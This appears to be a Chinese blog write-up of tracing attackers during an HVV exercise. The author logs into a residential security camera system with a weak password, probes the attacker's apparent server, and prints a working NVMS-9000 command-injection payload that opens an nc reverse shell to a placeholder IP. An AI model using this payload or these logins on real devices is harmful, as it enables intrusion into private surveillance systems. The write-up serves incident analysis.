起因

HVV期间在防火墙上抓取到了几个攻击IP。作为防守人员，甲方爸爸自然把这些IP拿给我们进行溯源（我。。。）

溯源

查询这几个地址，发现均为台湾IP（IP太多了，就拿一个举例吧。。。）

微步查询为傀儡机

对直接攻击源进行端口探测，发现其开放RTSP和HTTP业务，访问直接攻击源的80端口，发现一个登录界面。尝试弱口令登录成功，通过观察为居民家庭的安保监控系统。

在这个监控系统中发现有NC反弹shell的命令，分析是攻击者拿到监控设备服务器后作为肉鸡进行攻击，NC反弹命令中有攻击者IP

查询IP地址为美国，对其端口探测，发现其开放的SSH服务和HTTP业务，访问直接攻击源的80端口，发现一个apache界面，判断此IP可能是攻击者的VPS服务器，经过初步尝试，暂时没有发现获取权限的方式，无法深入（就是自己菜。。。）

分析监控

既然无法深入，那转头研究一下攻击者是怎么拿到监控摄像头权限的吧

对监控界面抓包发现了摄像头型号

百度查找发现此型号存在一个RCE漏洞

https://www.secrss.com/articles/14661

使用base64管理员凭证向/editBlackAndWhiteList路径发送SOAP格式的HTTP POST请求，body中含有命令执行，尝试在摄像头上使用nc命令建立一个反向shell，将流量重定向到远程服务器的31337/TCP端口上

EXP如下：

<?xml version="1.0" encoding="utf-8"?>
<request version="1.0" systemType="NVMS-9000" clientType="WEB">
<types>
<filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode>
<addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType>
</types>
<content>
<switch>true</switch>
<filterType type="filterTypeMode">refuse</filterType>
<filterList type="list"><itemType><addressType type="addressType"/></itemType>
<item><switch>true</switch><addressType>ip</addressType>
<ip>$(nc${IFS}IP${IFS}1234${IFS}-e${IFS}$SHELL&)</ip>
</item>
</filterList>
</content>
</request>

获取shell